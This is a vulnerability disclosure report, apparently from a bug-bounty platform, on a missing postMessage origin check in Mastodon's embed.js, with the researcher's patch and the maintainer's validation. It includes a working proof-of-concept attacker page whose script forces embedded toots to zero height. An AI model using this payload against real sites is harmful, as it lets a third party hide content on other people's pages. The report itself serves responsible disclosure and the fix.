Improper Restriction of Names for Files and Other Resources in mastodon/mastodon

Valid

Reported on

Jan 20th 2022


Description

The message event listener in embed.js does not check the origin of postMessage before changing the height of the embedded toots. The vulnerable code allows any origin to postMessage on the browser window and feeds attacker's input id and height to code and now attacker is able to change the height of toots and even make them disappear from the website by changing height to 0

Proof of Concept

STEP 1: Victim user post toots on mastodon and embed his/her toots on his/her website using following code:

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>Victim's website</title>
</head>
<body>

<br>
<iframe src="https://mas.to/@reo1212/107650549212219629/embed" class="mastodon-embed" style="max-width: 100%; border: 0" width="400" allowfullscreen="allowfullscreen"></iframe>
<script src="https://mas.to/embed.js" async="async"></script>

<br>
<iframe src="https://mas.to/@reo1212/107651044255197372/embed" class="mastodon-embed" style="max-width: 100%; border: 0" width="400" allowfullscreen="allowfullscreen"></iframe>

<br>

<iframe src="https://mas.to/@reo1212/107651044524139207/embed" class="mastodon-embed" style="max-width: 100%; border: 0" width="400" allowfullscreen="allowfullscreen"></iframe>

<br>
<iframe src="https://mas.to/@reo1212/107651044731807705/embed" class="mastodon-embed" style="max-width: 100%; border: 0" width="400" allowfullscreen="allowfullscreen"></iframe>

<br>

</body>
</html>

STEP 2: Attacker host the following code on his/her website.

NOTE: PLEASE change the required values of target website in the code

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title></title>
</head>
<body>

<p>
This exploit will change the height of all the iframe tags with class "mastodon-embed" to "0" which will make the embedded toots to disappear from the victim's website till the time that browser window remains opened.
</p>

<script>
    function exploit(){

    var target = 'http://localhost:8081/mastodon-iframes.html'; // SET THIS VALUE

    var NUMBER_OF_IFRAMES_IN_VICTIM_WEBSITE = 4; // SET THIS VALUE
    window.poc = window.open(target);
    
    const interval = setInterval(run, 2000);

    function run(){
        for(id=0; id<NUMBER_OF_IFRAMES_IN_VICTIM_WEBSITE; id++){
            
                var payload = JSON.parse(`{"type": "setHeight", "id": ${id}, "height": "0"}`);
                console.log(payload);
            
                window.poc.postMessage(payload,'*');
        }
    }

}
</script>

<input type="button" onclick="exploit()" value="EXPLOIT">


</body>
</html>

STEP 3: Now, exploit the vulnerability by clicking the EXPLOIT button on attacker's website.

you will notice that attacker's code continuously changes the height of toots to 0 to make it disappear from the victim's website.

Please check video PoC : https://drive.google.com/file/d/1ZcihyzMuguCpxhwdMiwTSWifydNgBdrg/view

Impact

This exploit will change the height of all the iframe tags with class mastodon-embed to 0 which will make the embedded toots to disappear from the victim's website till the time that browser window remains opened. No toots will be visible even when the user refresh the browser window.

Occurrences

Check the origin from where message is coming. Only allow trusted origins.

We are processing your report and will contact the mastodon team within 24 hours. 4 months ago
Rohan Sharma modified the report
4 months ago
Rohan Sharma modified the report
4 months ago
Rohan Sharma submitted a
4 months ago
Rohan Sharma
4 months ago

Researcher


I have submitted the patch. It checks whether the origin of incoming message is same as the origin of the website. i.e. If window.location.origin !== e.origin, then we return and does not go forward.

The fix_check_origin_and_prototype branch also contains the fix for the other vulnerability submitted by me.

Eugen Rochko validated this vulnerability 4 months ago
Rohan Sharma has been awarded the disclosure bounty
The fix bounty is now up for grabs
Eugen Rochko confirmed that a fix has been merged on 4d6d4b 4 months ago
Rohan Sharma has been awarded the fix bounty
embed.js#L15-L23 has been validated
to join this conversation